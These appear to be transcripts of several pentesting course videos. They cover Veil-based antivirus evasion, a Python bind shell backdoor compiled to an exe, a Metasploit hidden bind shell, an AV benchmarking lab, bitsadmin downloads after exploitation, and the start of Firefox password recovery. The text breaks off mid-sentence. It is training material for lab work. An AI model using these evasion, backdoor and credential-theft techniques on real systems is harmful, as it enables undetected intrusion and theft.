Hello all, welcome to the Network Pen Testing course at Pen Tester Academy. Now in this video, we will look at AV evasion with an interesting framework called Veil. So the Veil framework started initially as a very simple Python script and has now evolved into an entire framework. We'll be taking up different aspects of this framework in the next couple of videos. Now, as part of the Veil framework, Veil evasion is really the tool responsible for helping us with bypassing antivirus solutions. Now, Veil evasion does this using various different techniques, and we'll visit some of them in this videos. What is going to be the setup for this? Well, I'm going to go ahead and run my Windows host, which is a Windows 8 computer, and this has a McAfee AV built in, and then I have a victim guest as well, which is again Windows 8 and has AVG installed. Now I have a shared folder across the VMs inside which I will be creating all of these samples which are created with Veil, and then we'll see if AV evasion is possible or not. So let me quickly run you through how this looks like. So here is the victim system, Windows 8. Then I have Kali Linux running, which has Veil installed. Now keep in mind, Veil does not come pre-installed by default. You would need to install it. And finally, I have my host system, which basically has the shared folder, right? So the shared folder is actually shared between the host, the guest Windows 8, and the guest Kali Linux system, right? All three. This just makes it very easy for us to transfer files back and forth. Cool. So the Veil framework currently has 33 payloads in it, and they keep adding new payloads every month, so keep checking that out. Now, what is the real concept behind most of the evasion in Veil? Well, if you recall, Metasploit is basically a multi-stage payload, and there are two stages. Stage 1 is what creates the actual network connection between the victim and the attacker, and it is across this stage that stage 2, which is typically the Metasploit DLL for Windows based victims, is sent over and then executed on the victim. Now the interesting part is that stage 1 itself is really needn't be written in shell code and can be implemented in high level languages like C, Python, C#, etc. And the concept is really that this stage is going to receive the second stage DLL and loads it in memory and passes control to it. Now because stage 1 is what really executes and has a presence on the disk, if stage 1 can be obfuscated properly, then the AVs will not complain, and hence we would be able to run Metasploit using the reflective DLL injection. Now, how does stage 1 really work? The original article was probably created by Raphael Munch, the author of Armitage, and he had written some sample C code. I've picked up this slide from the Veil Framework's website, and they have a quick synopsis, which is a TCP connection is first opened to the handler, and then the handler sends back 4 bytes indicating the DLL size. This is really the Metasploit DLL, and the socket number is set up on the EDI register. This is so that when the Metasploit DLL runs, it can pretty much use the same socket rather than having to create a new one. and then once this DLL is loaded in memory, control is passed to it and it executes. So now let's jump right in to using Veil and creating some binaries which can help us evade AVs. So I've already installed the Veil framework, and I'm going to be using Veil Evasion in the first couple of demos. If you're having trouble installing Veil, search online. They even have their forums. If you really can't figure out the issue, then tweet to me. I'm SecurityTube, and I'll probably see if I can create a new video for just Veil installation. So once we run Veil, it gives us a couple of options. To list all the payloads, we can do a list and hit an enter. So we see a bunch of payloads in here. Scroll up. Now, many of these payloads is really the stage 1 which has been rewritten, and there are others which allow us to go ahead and use scripters, scramblers, and all of that. Now, in this specific video, let's actually take up this group, which is actually a rewrite in C. So I'm going to take up C Meterpreter reverse HTTP as the example. Let's go ahead and create a binary with this payload. So I'm going to say, just like Metasploit use, you can either paste the payload or you can paste the number, whichever one it works. So you could do a use. Now if you notice, again, just like Metasploit, you need to fill up the L host. The IP address of the attacker machine is 192.168.10.10. You can fix this based on whatever IP address you've given to your machine. There we go. Let me again hit an info. Clearly see now this has been filled up. Let's go with the default port 8080. Compile to exe set to Y, which is great. And now let's actually type in generate. So now this requests us for a specific name which we can give to the file, right? Now before I do this, keep in mind that all of the files by the Veil framework are actually created inside a directory called Veil output, right? And before beginning, you can always clean it up. So I'm going to let's say go ahead and start a new instance of Veil Evasion, right? And I can do a clean. This ensures that everything which was in there from before has been deleted, and we can start on a clean slate. There we go. So now we need to enter a base name for the output file. Let me actually go ahead and say this is basically a rev HTTP in C, right? There we go. And if you notice, Veil has done its job and it's written the binary here. We can verify this by doing a quick file on the binary, and we'll actually see that this is a 32-bit executable. Fantastic. Now let's actually copy this out to our shared folder. My shared folder is loaded under SF Kali, and then I go inside the Veil folder and copy this in. Awesome. Now if I go back to the host machine, I'll actually see that rev HTTP inc now appears in here. So let me go ahead, right click and scan this with McAfee, and let's see what McAfee says. Okay, seems perfectly fine. There are no issues. Now let me quickly hop over to my Windows 8 computer. Let me refresh the shared folder. Let's scan with AVG. Again, AVG also does not complain. It says this is perfectly okay, right? And keep in mind, everything is updated, right? This is all updated probably, you know, up to today. Now let's actually get Metasploit on the box. Now you can start MSF console and use exploit multi-handler and set stuff up, or you can actually use a really interesting shortcut. So if we go ahead and check out the Whale output directory, you'll actually find there is a folder called handlers, and inside this we already have a Metasploit RC file in there. Fantastic. So I'm just going to type in Metasploit, MSF console. Now if you do a -h, you'll actually find that a resource file is fed in with the -r option. So I'm going to do an MSF console -r, and then there we go. So this has all the details, and this will automatically set up MSF console, right? So this saves us a good amount of time. We don't have to punch in the IP addresses, the port numbers, and all of that manually. This manages it for us. Of course, we'll have to go ahead and wait for MSF console to start. As you can clearly see, most of the stuff for you has been very well automated. So let's wait for it. It just takes a little bit of time, because just by starting MSF console, all those modules and everything are being preloaded. That is what takes a bit of time. It is possible to install Whale on Ubuntu as well. If you visit their website, they have documentation specifically telling you how to do that. Okay, fantastic. So our handler has been invoked and it's running in the background because we use the -j. And now we go back to our Windows 8 victim and let's run this. So we run it. The AVs don't complain, and there you go. We have a Metasploit session. Fantastic. Let's do a sessions-l. There we have it. Sessions-i1. sysinfo. Get UID. And there we are, right? So we've got Metasploit on the box, and we've done this by completely bypassing AVs, right? Both AVG as well as we've tested it with McAfee. Now, if you are online at this point, which is your VM is online, then Whale has a very interesting option which says check VT. And what check VT does is it checks virus total if this or any specific payload which you created is already detected by virus total or not. And it does that by sending the hashes to virus total using their API. I think I'm not connected to the internet, so check might fail right now. But this is a very good way of quickly verifying that your binary is safe without uploading it to virus total and have them fingerprint it. Right? Great. So one of the other aspects which I wanted to touch upon is still now what we've pretty much done is just a quick automated analysis, right? As I said, looks like we weren't able to connect. There does seem to be a small bug in here, which is if the connection fails, it says no payloads found on virus total, right? Might not necessarily be true. So keep that in mind, but we can clearly see a trace which tells us that we weren't able to connect to the service, right? Socket error. Okay, now let's try and understand a little bit of internals as well. So let me exit this. Now, if you go inside Veil output, there are a bunch of directories. The one which is interesting to me is actually source. Now, what Veil does is, if you recall, it said, C, Meterpreter, reverse HTTP. So basically, it has written stage 1 entirely in C, and this is the actual C file. So let's open this up, and we can clearly see a bunch of jumbled up functions in here. If you want to actually look at it better, then just remember to install a little tool called indent. In my case, it's already installed. You can do an apt get install indent, and then you can apply indent to this file. It just makes it a bit more readable. There you go. Right? You actually see that the function names, the variable names, and all of that has been obfuscated. And probably there are a lot of random routines and maybe even junk routines in there. But clearly you actually see that just to go ahead and do a reverse HTTP, Veil seems to be going through a lot of pain, running through a ton of loops, right? Because in many cases it just wants to ensure that the AV can't pick it up, right? So AVs will look for signatures. Of course, in this case, finding a signature is going to be very, very difficult. AVs also probably try to go ahead and run a couple of instructions, simulate them to see if any virus or worm-like behavior is happening, and that is where you could add a lot of junk statements or run a lot of loops in there, which would go ahead and eventually make the AV feel that this is a safe binary, right? You can of course go through the whole source code and try and understand what is being done. But most of these techniques are quite commonly used for AV bypass, right? Fantastic. It's pretty cool that Veil actually gives us the C file, and the best part of this, of course, is that you can make modifications to this yourself and compile it into a binary and use it, right? So this gives you a ton of flexibility. Awesome. So hope you guys enjoyed this video, and if you're having fun at Pentester Academy, then please do recommend us to your friends and colleagues in the InfoSec community. Thank you.
Hello all, welcome to the Network Pentesting course on Pentester Academy. Now in this video, we will look at how to create a custom bind shell backdoor. In references again, have a look at David Kennedy's excellent examples available on his website. Now let's jump right in. Let me quickly write the skeleton code. Let's import socket and subprocess. Let's create a socket. Address family is AF_INET, while the socket type is stream, which is TCP. Now let's bind this socket to a port on which we're going to listen. And for this we give a tuple consisting of 0.0.0.0, which basically means bind to all available interfaces, and a port number, let's say 48. Now let's go ahead and listen on this socket for one connection, and after that let's accept a client connection using sock.accept. Now accept returns a tuple consisting of the client socket and the client address. The client socket is what we will use for most of our communication, right? Now after this, let's receive data from the client socket. And let's continue this till we keep receiving something for the client. Let's go ahead and put in our exception try except loop again. So the output of the command check underscore output, plug in the data, shell equals true, and then we send it back to the client. If there are any exceptions, let's just basically pass and move on. And let's go ahead and receive further data from the client sock so that the loop can continue. Everything goes well. Let's close client socket, and let's also close the server socket. Now let me go ahead and quickly check this up for any typos. Import sockets of process. Okay. Now this is stored in a file called backdoor bind shell. Let's try and run that file. Let's see if we get any errors. Okay. Now let's actually use the attacker machine to do a netcat to the victim IP address on port 8888. Connected, let's do a dir, and there we go, right? So now we have a bind shell Python script which seems to be working perfectly. So let's go back in, let's kill the connection, and now let's use PyInstaller to go ahead and create an exe out of this. This should just take a bit. Okay, if we go back to dist in here, we see our backdoor bind shell. Let's run this. If you notice, basically asks us if we should allow for this to bind. Let's allow the access. Go back in here, try and connect again, and it works as expected, right? Fantastic. So this is how simple it is to really create a bind shell as well as a reverse connect shell as we saw in the previous scenario, right? So hopefully you're now all charged up to write your own little backdoor using Python. Now you can try and upload these samples to VirusTotal and other websites, and what you would find is more often than not, typically this won't be detected as malicious activity. And the simple logic is all this is doing is basically binding to a port and executing commands and things like that, which really even legitimate programs would do. And that is what makes this very, very difficult to categorize as illegitimate or illegal behavior on the client box. So that's all for this video. Thank you. Welcome to the network pen testing course at Pentester Academy. So in this video, we will look at a hidden bind shell payload. Now this is a very interesting shell code which I found out just 2 days back, and the reference is from Borja Merino. The blog post is given for you to look at, and I'm hoping this will be included in the formal Metasploit payload as well. Now, basically what Borja has done is, in most cases, if you have a bind shell payload and you end up running it, then anyone can access that payload. Now, at the very same time, a lot of network scanners can go ahead and detect the presence of such a shell. Now, this is really where one would probably want to try and maybe use like an IP based ACL to ensure that only the attacker's machine manages to connect to the bind shell. Now, of course, such a bind shell which actually goes ahead and firewalls by IP would have to do it at the lowest level possible, which is in the TCP stack itself. Because if it does not do that, then you could have a SIM scanner or anything else easily detect its presence. So this is where what Borja has done is he's used set sock opt and ensure that the accept is conditional, and after that his shell code actually decides whether to accept the connection or not based on the IP address, right? Now, as far as using this shell code is concerned, it's quite easy. You can download the handler and the payload from the links given here and put them in the appropriate folders as mentioned below. After that, the process is really quite simple. You would just use MSF Venom, give the payload name, followed by the port. I'm using exactly what Borja has done, 54321, and the A host or the allowed host really, let's say, is 1.10, right? After this, we transport this to the victim machine, which is my Windows 7 machine, and let's execute this. Now, if I go back to my Kali machine and actually do an nmap scan, so the Windows machine is on port is on IP address 1.30, and the port number I am interested in is 54321. You would actually notice that currently the state seems to be open. Now, this is really because the attacker's IP address is 1.10, right? Now, if I change my IP address to 1.11 and try the scan again, you would actually notice that the state comes to be closed at this point, which is basically, if you are not the attacker, you would not be able to see this bind shell remotely. So now let's bring my IP address back here, do an nmap scan again. Happy to see the port is open, and I'm going to use netcat to connect to the remote machine, and there we go, right? Fantastic. So I think this is a really cool example of how one can innovate over the existing shell codes. We have a shell coding course for those who are interested, and one of the other ideas which I can give is, let's say, binding by IP at times could be different, so maybe we'd like to even authenticate by username and password. Now, this is one of the shell coding assignments for the exam which I had given in the 64-bit shell coding course. So if you're a Pen Tester Academy student, or if you bought our shell coding courses, then have a look at both of these courses, 32 and 64-bit shell coding on Linux, and that teaches you step by step how to understand and write your own custom shell code. Credits again to Borja Merino. I think this is fantastic, and I hope to see this within the Metasploit framework officially. That's all I had in mind for this video. If you're enjoying your time here at Pen Tester Academy, then please do recommend us to your friends and colleagues in the InfoSec community. Thank you.
Hello all. Welcome to the Network Pen Testing course at Pentester Academy. Now, in the previous video, we talked about Veil and AV evasion. Now, keep in mind that AV evasion really requires going ahead and benchmarking your binary against a bunch of AVs. And this is where there is a need to create a dedicated AV testing lab. Now, why is this so important? Now, in the world of AV evasion, or for that matter, even network IDS evasion, it is very, very important to know your target. As I mentioned, there is really no silver bullet as far as AV evasion is concerned. And more often than not, one of your binaries would be detected at least by one or more AVs, right? And this is where, if you already know what your client is running, or if you can benchmark against the most common AVs used in the enterprise, then you can go ahead and custom build your bullet against that AV or AVs. Now, this is where creating an AV testing lab is very, very essential. Now, how would you go about building one? Well, unfortunately, it might not be possible for us to buy licenses to every AV and operating systems. Now, this is where we're pretty much going to live on evals. Now, you can download the latest Windows evaluation versions, the Windows 8 Enterprise, I think Server 2012, etc. And at the very same time, the good news is that almost all AV vendors offer at least a 30-day evaluation version. So now let me show you what I've done. So I've created a very small AV testing lab. I have a 64-bit Windows 8 machine, which is an eval version. I have Windows 7 licenses with me, so I've gone ahead and used them. Now you could go ahead and just use Windows 8 eval and pretty much install separate AVs on each of them. Now the reason you want to do that is having multiple AVs on the same system almost always causes issues. And at the very same time, you want to ensure that the system you're benchmarking on only has that AV as the preventive measure. So let me go ahead and boot up all these VMs. Now the best idea would be to go ahead and install only the barebone AV. There could be many other bells and whistles like anti-spam filtering, email security and firewall and all of that stuff. Pretty much preferably just have the AV on in there. Now, of course, you would need a really powerful machine to be able to run multiple OSs at the same time. I'm actually using an Alienware laptop here, which has 16 gigs of RAM. I think if you're serious about pen testing, you at least need a laptop with 8 gigs of RAM at the very minimum. 16 would be fantastic. 32 would be awesome, but might be quite expensive. So that's important, just so that you don't have to spend a lot of your time just booting different machines and booting them down just because you do not have enough RAM. So I'm booting this machine up. In the meantime, the others are booting as well. Maybe I've entered the wrong password. We'll know in a bit. There we go. This machine is booting up as well. Boot it up. Now on this specific machine, I have AVG installed. Right? Ensure that you go ahead and disable internet access from time to time, just so that if you're testing with different malware samples and by mistake you end up running something and the AV doesn't detect, it should not break out of your jail. I'm using, as you can clearly see, a Windows 8 Enterprise eval. It's a 90-day eval. The AVs are 30-day evals. So in most cases, if you're doing this, on the side as a pen tester, self-funded, you might have to go ahead and build your machines every 30 days once the AV eval goes through. Of course, if you're funded, I would highly recommend purchasing licenses. Unlike the olden days, most AVs are quite cheap to purchase, at least for an enterprise. So here is my AVG. Let me go ahead and boot into these machines as well. So this contains my Norton. This one's still booting. And if you notice, we are completely protected. It's updated as well up till today, which is fantastic. And similarly, just waiting for these to boot up. You can clearly see even with 16 gigs of RAM, it does take a bit of time to run all of these machines simultaneously. And on my local machine, I have McAfee, right? I have McAfee, which is running. I've currently put real-time scanning to off. The simple reason is I want to test a couple of samples and I want to go ahead and scan it rather than have McAfee immediately complain about it. Right, so if you notice, I've installed Kaspersky on this one, and then I have Norton running on this one. Right, fantastic. So create your own AV lab. I would highly recommend going ahead and at least having all the popular AVs on them. At the very least, definitely have McAfee, Norton, Kaspersky, AVG. And of course, depending on if you get to know what your target is running, have them in there as well. Of course, are going to have Windows Security Essentials by their own default. And in the next video, we will use this benchmarking setup to go ahead and play with Veil even more, and then try and see how different AVs react to it. So stay tuned. And if you're enjoying your time at Pen Tester Academy, please do recommend us to your friends and colleagues in the InfoSec community. Thank you. Hello all. Welcome to the Network Pen Testing series at Pen Tester Academy. Now in this video, we will prove why AV evasion is no silver bullet. And this is part 1. And we'll cover the rest in part 2 because I don't want the videos to be too long. Okay. Now, unlike a lot of popular belief, there isn't a silver bullet for AV evasion, which means it is highly unlikely that you would end up with a long-term way of going ahead and creating malicious binaries which aren't detected by AVs. Most of the time, your binary is going to be detected at least by some AVs, and if the technique is really outdated, pretty much all AVs might end up detecting your binary. Now, as far as creating payloads is concerned, let's try and understand the basics. How do we go from a payload to a binary using techniques such as encoding, crypting, and compression, right? And this is where payload jugglery is involved. So let me tell you. Now, the most common case, of course, is we take the payload and run it. That, of course, is going to be super easy for AVs to detect. And this is probably the technique with the least amount of chance of success. Now, a more common technique around the payload is to encode it with different encoders. people who love MSF Venom and MSF Payload might remember the Shikata-ga encoder as one of the more popular ones, right? And this at times might be able to beat AVs, though, over the long run, I think it might be very difficult just to beat AVs with encoding. Now let me also explain these boxes a bit. Here is the payload, and when we actually have the encoding box around it, what this means is the payload is now encoded, right? Now let's move on to the next one. The next option is we take the payload, we encode it using an encoding technique, and then we use a crypting technique to encrypt it, and then finally we can compress it, right? Now crypting can happen using cryptors which are available. Hyperion is an very popular one lately. Compression, you can have tons of packers. UPX is a popular one. You could even think about creating your own compression algorithm, right? Fantastic. Now another option, of course, is we take the payload, we encode it, we first compress it using a compression algorithm, and then we crypt it, right? Now keep in mind that there isn't any hard and fast rule of the specific order in which you do things. Of course, typically the payload comes first, then you can apply encoding, crypting, and compression pretty much if you wanted in any order, right? Also, you could chain and have more than one encoding, crypting, and compression technique being added around the payload. So you could take the payload, you could encode it with a XOR encoder, then crypt it, then again encode it with Shikata-ga, then compress it, then again crypt it, and then again encode it with Shikata-ga, and so on and so forth. However, keep in mind that every additional step which you add, A, will increase the size of the executable, and B, will also increase the amount of time and resources required to finally reach the payload and run it, right? So let's understand how the running part works. Now for just an encoded payload, the first step is to decode it. So the decoder stub would run, decode the payload, and then the raw payload would be run by passing control to it. Now in the second case, if you recall, we took the payload, we encoded it, we crypted it, and we compressed it. So the compression is the outer layer which has to go out first. So first decompression happens, then we have the encryption, so decryption happens, and then similarly decoding happens to finally get the naked payload which would be run. Now in the last case, we would decrypt first, decompress next, decode after that, and then run the payload, right? So hopefully this concept is now crystal clear to you. And keep in mind, as I mentioned earlier, you can juggle around with these techniques. You can apply these techniques more than once, but of course the size of the executable and the time taken to finally execute the payload would increase. Okay, so now let's actually take Veil and go ahead and try and apply some of these techniques. So I'm going to go ahead and probably use a subset of these techniques. So I'm going to use the shellcode inject payload, which has AES encrypt. And first, I'm going to have the Phi-Herian disabled option taken. So let me go in here. Here is my Kali Linux instance which is running. The compiled folder, I'm actually running a web server in there using Python-m simple HTTP server. Right, this is so that any binary which is created can be served basically to our target VMs. Here they are. Here is my Windows 8 running AVG. Here is my Windows 7 running Kaspersky. And then finally, here is another Windows 7 running Norton. So let me go back in here. Let me start Veil Evasion. Let me look at all the payloads. Now the one I'm going to pick up right now is this one, Python shellcode inject AES encrypt, right? So you can already see that we are trying to create an exe basically and then encrypt it. So let's actually use this one, use 27. So compile to exe, set to yes. Expire payload, well, we don't care much about it. Inject, let's leave it at the base option, and in the very first try I'm going to have the Fiherian disabled, right? So let this be disabled just like the option, and now let me generate the payload. I'm going to use MSF Venom, which in turn is going to use the Windows Metasploit reverse TCP as the default option. Let me hit an enter. The L host value is the attacker's IP address, which is 192.168.10.10. Oops, did I make a mistake? So let me just quickly check that. 192.168.10.10. There you go. I may have added an extra or something over there. The L port, let this be 9000. MSF Venom, now keep in mind here is where you can add the encoding and all of that. You can play with it later. I'm just going to generate the base shell code. And because we are creating a binary, there is really no need for bad character filtering and all of that, right? Enter a base name for the payload. Well, in this case, so actually use a simple nomenclature. I'm going to say AES Pi disabled, right? Or PYH disabled. So this is going to be, let's say just PYH disabled, right? Because we know the payload name already. Let's use Pi installer, the default one. And now it's creating the binary for us. If you notice, this has been created in here. Let me copy this out if we need it. Now let's actually serve this to our victim VMs. This one is running AVG. Let me refresh the page. There we go. Let me save it. Right, and let me go to the downloads folder. There we have. This is something from a previous demo which I tried. Let me first delete it just to avoid any form of confusion. Okay, so let's scan this with AVG. If you notice, AVG is not complaining at all. Fantastic. So this is okay with AVG. Let's now move on to Kaspersky. Let me again save this on the desktop. It's just way more easier to deal with it. Let's see what happens. Let's scan. And if you notice, it basically says no threats detected. Fantastic. We clear here as well. Finally, let's actually go to Norton, see what happens here. Store this again. Desktop. Close it. Let's go back in here. Let's scan. This is just too good to be true, right? Just with the basic AES encrypt, if you notice, none of the AVs seem to be, able to detect that something is wrong, right? This is pretty sad. Now let's actually copy this to my USB so that I can check it on the host machine with my cafe. I have a USB device. I was using shared folders before, but it started giving me a bunch of problems when I'm mounting the same folder on more than 3 VMs. So I've defaulted to this technique. So let me go to Whale output, compile, and let me just copy this binary out, paste it in here. This is my USB drive. Cool. Let me remove this so that it goes down to the host machine. Right, let's pause the video briefly so that I can bring up the USB folder. Okay, so here it is. Let me go ahead, right click that, scan it with McAfee. I've disabled the live scan just so that I can go ahead and do this. But if you notice, McAfee seems to detect it, and it even tells you that this is Trojan-Whale, right? So looks like McAfee is at least detecting that something has gone wrong here, right? And it is detecting this as Trojan-Whale. Now, keep in mind that if you go inside Whale and do a quick check VT, I'm not connected, but it would actually say no payloads found simply because nobody has submitted yet. But McAfee probably might be going ahead and fingerprinting the stub or something in the binary, because it can even tell us this was created by Whale, right? Which means it is definitely fingerprinting something in Whale. Awesome. So this is the first benchmark, right, which I've created down here, which is shellcode inject AES encrypt FireIan disabled. Now in the next video we'll come back and look at FireIan enabled, right? Hope you guys are enjoying this video, and if you are, please do recommend us to your friends and colleagues in the InfoSec community. Thank you.
Hello all, welcome to the network pen testing course at Pentester Academy. Now in this video, we will look at bits admin and why it is interesting to pen testers. So let's say you've broken into a victim and one of the tasks involves downloading files on the victim but from the web. Now typically you'd probably try and maybe upload a Windows version of wget, or pretty much most people try to solve this by scripting in VBScript or PowerShell. Now uploading wget and then putting it to work, of course, is a painful task, because you're going to go ahead and have to download wget, and this might send out some alarms. And scripting, well, not all of us script, and at the very same time this brings the barrier up. So this is where what I've seen that many pen testers probably overlook, that Windows natively supports downloading and uploading jobs using a utility called bitsadmin. Now even though they actually say you should probably move to PowerShell rather than use bitsadmin, this is installed in Windows 7 and a couple of other versions as well. So the best part is bitsadmin can work in batch mode, and as I said, is natively supported on Windows. So let me actually show you a demo of how to use bitsadmin. Now for the sake of simplicity, I assume that we've broken into a victim and we have a command shell using Metasploit, right? So rather than doing that, I'm using the command interpreter. So you can actually type in bitsadmin, and the first task is to basically create a job using the /create and then the job type, which is download, and then the job name. Let's call it hacker job. So this is bitsadmin /create /download, and the name of the job is hacker job. Now if you notice, it says created job and gives us a ID. Fantastic. Now let's actually begin adding files to this job. Now the best part is you can add as many files as you like, and they do not immediately start getting downloaded. they pretty much just get added to a list at this point using the add file switch. So let me add two files, say bitsadmin, add file, give the name of the job because you could actually create multiple jobs, and then the location of the file, so code.securitytube.net hexpass.exe, and then the local location of the file. So let's say I'm going to store this in C drive users securitytube desktop. So it's going to be C drive users securitytube desktop. The name of the folder is demo, and let's store this as hexpass.exe, which is going to be the first file, and then there's another called mempass.exe. So let's actually add both of these files to the hacker job task. So if you notice, it says added the file, and now let me go ahead and add mempass as well. And it confirms that mempass was also added to the job. Fantastic. Now at this point, these files have been added and really the job hasn't started yet. And you can verify this using bitsadmin/list, and it'll actually mention that hacker job is suspended. Let's clear the screen, bitsadmin/list, and you see it basically gives you a job ID and says hacker job suspended, and looks like there are 2 downloads in there. Okay. Now if you actually want to start the job, you can use resume, and this would start the actual job. And after that you can use monitor to really see what is happening. So let's go back in there, clear the screen, to a bitsadmin/resume, give it the name of the job, which is hacker job, and if you notice it says job resumed, then we can do a bitsadmin/monitor, which allows us to monitor all the jobs. And if you notice, it says hacker job connecting, and this has a 5-second refresh, so this isn't really refreshing too fast, so we'll have to be patient. Now the best part is you don't need to really monitor. You could pretty much go back to doing other post-exploitation tasks while bitsadmin is taking care of downloading everything. Now if you notice, it basically says transfer 2 of 2. Fantastic. And you could also have basically done a list to list all the tasks, and the status says transferred. Awesome. But as you clearly see below here, there aren't any files. So where are the files? Now this is where bitsadmin is a little interesting, is to actually have the files saved into the location you desire. You need to specifically say, okay, go ahead, complete hacker job. So we go back in here, bitsadmin/complete, and then put in hacker job. And the moment you hit enter, you'd actually see it says job completed, and both your files appear here which you've downloaded. Fantastic. And at this point there are no more jobs remaining. Awesome. Now if you want to abort jobs or probably just delete whatever is there in the job queues, you can use bitsadmin/reset, right? A lot of these examples are in here, so you can refer to this as well. Now, as you can clearly see, the best part of bitsadmin is because it is natively supported, it is a fantastic utility you could use for post-exploitation. And this is really what I want you to do. As an exercise, you can try and look at uploads, and if you create a short video or a blog post, definitely go ahead and tweet it to us via SecurityTube, and we'll make sure it's retweeted to our followers. So that's all I had in mind for this video. Hopefully BitsAdmin is going to be another tool in your arsenal. And if you're enjoying your time at Pentester Academy, then we would really appreciate if you can recommend us to your friends and colleagues in the InfoSec community. Thank you.
Hello all, welcome to the network pen testing series at Pentester Academy. Now in this video, we will continue with AV Evasion as No Silver Bullet Part 2. Now in Part 1, we looked at going ahead and using the shellcode inject AES encrypted payload with Fiherian disabled, and we found that apart from McAfee, none of the other AVs which we benchmarked against were able to detect it. Now let's go ahead and create a binary with Fiherian enabled and see what happens. So let's go back to our list. The one we are interested in is 27, so we're going to use 27. And in this case, we're going to set use Fiherian encryptor to yes. Quickly check everything is fine, right? And now do a quick generate. Let's use MSF Venom. That's okay. We can use the same payload. 192.168.10.10 is my IP. L port 9000. Now keep in mind, I'm not spending too much time actually running the binary. Really, all I want to prove is that the AV cannot detect the binary. You can try running them as well. Typically, if it can't detect it on disk, most of the times, it's not going to complain at all when running it. The base file. Let's look at this. So let's do this as PYH enabled, right? Seems logical. Let's use PyInstaller. Awesome. Seems to be created. Now let's run back to each of our VMs. Let me refresh this page. There we are. We have the enabled one in here as well. We save it. We go to the folder, downloads. Here is the one which has that enabled. Scan with AVG. Okay, looks like AVG has no issues. It's absolutely fine. Let's move on to the next one, which is Kaspersky. So again, save this desktop. Let's scan this. I think it's already pretty much okay. Let's quickly scan it. There you go. Again, no threats discovered for the enabled one. Here it is. Last one in here, detailed report. Here it is, right? Seems absolutely okay. Now let's run to our friend Norton and let's see what Mr. Norton has to say. Save this on the desktop. Close. I think we should be fine. Let's just scan it though. Okay, again, no threats found. Right? And last but not least, let me check our friend McAfee. Can do this by inserting my little USB key in there. problems with the USB key. Just quickly reinsert it again. Let me just put the video on hold and quickly check this. Okay, using another USB key, and let me go ahead and copy the binary. In this case, this is enabled. Let's copy this out, paste it. Now let's give back the USB to the host. Let's open this up. Here is my transcend. And let me scan this. Again, McAfee seems to have found it, right? Okay, which means McAfee 2, everyone else 0. Okay, good and bad. Now, let's actually try out one of the other strategies. So, in this case as well, we found that even though we enabled the 5-hairy encryptor, McAfee still found out that this is probably using something of Whale, right? It's probably got ahead and created a signature maybe of any of the decryption stubs or something else. Now, in the next one, we're actually going to use this binary 5-hairy enabled and then apply the native Hyperion wrapper on top of it. So here is what I'm going to do. I'm going to go back in here. I'm going to list all of these, and if we scroll up, you'll actually notice we have native Hyperion, and this is 13. So let me use this. Use 13. Now what this does is it takes the original exe, and then the Hyperion encryptor would run on top of it, right? So let's set the original exe root compiled, and then you have 5-hairy enabled, right? That's the one. Let's just double check that. Looks okay. Let's hit generate. Now you're going to see something very interesting now, right? Now, of course, you're thinking by default that because we've now applied, and let's call this PYH enabled, and then let's say hyper, right? Is done. Now, the assumption, of course, right now is that because this is now adding an additional layer of a cryptor on top of the old, Hyperion enabled binary, this should go undetected by the AVs, which were not able to detect the previous binary. So let's verify that. Let's go back in here. Let's refresh this page. You see this here. Save it. Oops. Right? Now AVG springs back to life and it has detected this one, right? Which basically, you already understood is what it is detecting is the Hyperion layer on top of it, right? It's figured out that the Hyperion encryptor is being used and probably it's flagging that, right? You could maybe look at all the details and see, right? And if you notice, I think this is really what it is, right? Win32 cryptor, right? Seems like they may have blacklisted the Hyperion encryptor itself. You may go online, look at more about it, but that is my initial suspicion when I look at this. Okay, so AVG scores 1, fantastic. Let's move on and look at Kaspersky. We save this. Aha! All of a sudden, everyone has sprung to life and the binary has disappeared. uh, Maybe we could click and see some report somewhere. Okay, 2 threats neutralized. This was the threat which was there. So this basically again says Win32 generic, not much of details, but hey, okay, it detected it. Fantastic. Let's finally go to our friend Mr. Norton and let's see what he says. Right, and interestingly note, just the addition of a cryptor layer is pretty much now flagging the binary. Right, let's scan this now with Norton. Okay, so basically this again says that there were no issues found. Okay, now let's try our friend McAfee, John McAfee's company. Everyone loves John McAfee. Let's see if this shows up. There you go. Just quickly copy my whale output. Here it is. Copy it out. Paste it in there. Give it back. Just pause while I bring up the USB. I'm back. Now let me scan this McAfee. Did you notice the irony now? Now McAfee actually thinks that this file is all clear. Interestingly, our friend McAfee was actually detecting this just a while back, right? But just adding Hyperion on top basically seems to, put McAfee off our back. So which might look like they don't have the Hyperion based signatures for the stub or anything else, which these other guys do, right? Which seemingly AVG and Kaspersky have added. And there you go, it says no issues detected. Fantastic. So do you now slowly start to appreciate the interesting things about this analysis? There doesn't seem to be a hard and fast way at all, right? I mean, you do something, AVA doesn't complain. You add an additional layer to it, AVA probably has a detection technique for it. Now it complains, right? And AVB, which had a problem with the previous binary, once scripted, of course, doesn't complain anymore. That sounds a bit logical at least. And this is really how benchmarking can help you a lot in understanding which AVs would detect your payload and which won't, right? I think the video is already pretty long, so I'm going to do a part 3 in which we are going to talk about the AES encrypt, Hyperion enabled, and then we're going to use an obfuscated PyInstaller, right? So that's all for this video. If you're enjoying your time at Pentester Academy, then please do recommend us to your friends and colleagues in the InfoSec community. Thank you.
Hello all, welcome to the Network Pentesting course at Pentester Academy. Now in this video, we will look at password recovery from browsers, and the browser will be Firefox. So why are browsers so interesting from a post-exploitation perspective? Now if you think about it, which is the application people spend most amount of time on when they are on a computer? Right? It's always the browser. And the browser contains a treasure trove of information. including but not limited to the browsing history, which can actually give you a lot of ideas as a pen tester about intranet sites and different URLs, etc. A lot of people store passwords and usernames on the browsers, now which is what we will recover in this video. And of course, you can have cookies, certificates, and whatnot, which once again is really important from a pen testing perspective. And in later videos, we look at how to extract them and reuse them. Now, the important thing to note is that different browsers have different locations where they store all of these information. Also, the file types may vary, and at the very same time, what they store also depends on what the browser developers did. So keep that in mind. Now in this video, we are going to go ahead and look at how to recover store passwords from a Firefox instance on the victim machine. Right? So let's jump right in. Now I've already exploited my Windows machine, and there's Firefox installed in there, which was used by the user. And my local present working directory is /temp, where I'm going to download all of those files from the browser cache. So let's actually go ahead and first look at where we are. Now this is the directory in which the Firefox profiles are actually stored. So if I do an ls, you would note a random value, and really whenever a new user starts using Firefox, such a random profile is created. So it's under user security tube, basically under app data, roaming Mozilla Firefox profiles, and you have this really interesting directory. Now this directory has tons of files in it. Many of which are very interesting to us. Let me pause the video for a second. Okay. And if you notice, we have something which is called cookies.sqlite, cert8.db. You can also see a lot of interesting ones like form history, key3, and a bunch of others. So it might be interesting to actually download this entire directory locally and then play with it. So let's download this directory using a recursive download option. And we can go ahead and open a new tab 